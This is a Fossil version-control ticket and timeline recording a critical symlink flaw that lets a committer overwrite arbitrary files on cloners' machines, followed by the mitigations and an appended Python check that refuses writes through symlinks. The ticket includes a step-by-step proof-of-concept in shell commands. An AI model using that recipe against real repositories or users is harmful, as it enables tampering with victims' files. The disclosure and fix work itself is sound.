Fossil

2020-08-19
00:18 Fixed ticket [f9831fdef1]: Arbitrary file overwrite using symlinks, plus 4 other changes (artifact: d80591cb72, user: drh)
2020-08-18
12:17 When writing files to disk for a check-out, refuse to write through a symbolic link to a directory. Ticket [f9831fdef1d4edcc]. (check-in: a64e384f0c, user: drh, tags: sec2020)
2020-08-17
19:03 Ticket [f9831fdef1] Arbitrary file overwrite using symlinks: status still Open, with 5 other changes (artifact: efa1c51ead, user: drh)
17:34 The allow-symlinks setting is no longer versionable and is off by default. The allow-symlinks setting no longer propagates with a clone. The help text for allow-symlinks discourages its use. There is a new --symlink flag on "fossil open" to permit the use of symlinks on an open, for the adventurous. Ticket [f9831fdef1d4edcc]. (check-in: ff98dd5af6, user: drh, tags: sec2020)
08:39 New ticket [f9831fdef1] Arbitrary file overwrite using symlinks. (artifact: c95172ddcb, user: drh)

Ticket Hash: f9831fdef1d4edccd10e4e416062820b63a15ee4
Title: Arbitrary file overwrite using symlinks
Status: Fixed
Type: Code_Defect
Severity: Critical
Priority: Immediate
Subsystem:
Resolution: Fixed
Last Modified: 2020-08-19 00:18:49
Created: 2020-08-17 08:39:03
Version Found In:
User Comments:
drh added on 2020-08-17 08:39:03:

A malicious user with check-in privileges can overwrite arbitrary files on a victim's system by exploiting weaknesses in the symlink mechanism of Fossil. Max Justicz provides the following demo:

fossil init oops.fossil
mkdir checkout
cd checkout
fossil open ../oops.fossil

ln -s /tmp/ link
fossil add link
fossil commit -m "add link"

echo "oops" > link/foo.txt
fossil add link/foo.txt
fossil commit -m "add foo"

# Remove the file so we can show the exploit works
rm /tmp/foo.txt

cd ..
fossil serve oops.fossil

# In another terminal
fossil clone http://localhost:8080/oops.fossil oops2.fossil
mkdir checkout2
cd checkout2
fossil open ../oops2.fossil

# /tmp/foo.txt was created!
cat /tmp/foo.txt

drh added on 2020-08-17 19:03:53:

Mitigations from check-in ff98dd5af61aef30ca4:

  • The allow-symlinks setting is off by default. Users must explicitly enable symlink support in order for Fossil to create symlinks.

  • The allow-symlinks setting is no longer a versioned setting. It must be set manually by the developer who wants to use it.

  • The allow-symlinks setting no longer propagates via clone. The setting continues to be off by default for clones even if it is on in the server.

drh added on 2020-08-19 00:18:49:

Additional defenses:

  • When checking out files, do not write files that are beneath a symlink in the check-out.

  • When doing a "fossil add" ignore files that are beneath a symlink.
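A defender-side illustration of the rule in the last two comments (refuse to write a check-out file when any path component inside the check-out is a symlink, and reject paths that escape the check-out root). This is an added example, not Fossil's own code; the function names, the temporary-directory fixture and the "outside" directory standing in for /tmp in the demo above are assumptions.

```python
import os
import tempfile

def symlink_in_path(root, relpath):
    """Return the first component of relpath (under root) that is a symlink, or
    None. The leaf is checked too, since open() for writing follows a symlink
    leaf just as it follows a directory symlink higher up."""
    parts = [p for p in relpath.replace("\\", "/").split("/") if p and p != "."]
    if os.path.isabs(relpath) or ".." in parts:
        raise ValueError("path escapes the check-out root: %r" % relpath)
    cur = root
    for part in parts:
        cur = os.path.join(cur, part)
        if os.path.islink(cur):          # False for components that do not exist yet
            return os.path.relpath(cur, root)
    return None

def write_checkout_file(root, relpath, data):
    """Write data to root/relpath only if no symlink lies on the way.
    Returns True when the file was written, False when it was refused."""
    if symlink_in_path(root, relpath) is not None:
        return False
    full = os.path.join(root, relpath)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)
    return True

def demo():
    """Constructed fixture mirroring the ticket's demo: the check-out holds
    'link' -> a directory outside it, and a manifest names 'link/foo.txt'."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "checkout")
        outside = os.path.join(tmp, "outside")   # stands in for /tmp
        for d in (root, outside):
            os.makedirs(d)
        os.symlink(outside, os.path.join(root, "link"))
        via_link = write_checkout_file(root, "link/foo.txt", b"oops\n")
        plain = write_checkout_file(root, "src/main.c", b"int main(void){return 0;}\n")
        try:
            symlink_in_path(root, "../outside/foo.txt")
            traversal_rejected = False
        except ValueError:
            traversal_rejected = True
        return {
            "via_link": via_link,                                          # False: refused
            "plain": plain,                                                # True: written
            "escaped": os.path.exists(os.path.join(outside, "foo.txt")),   # False
            "traversal_rejected": traversal_rejected,                      # True
        }
```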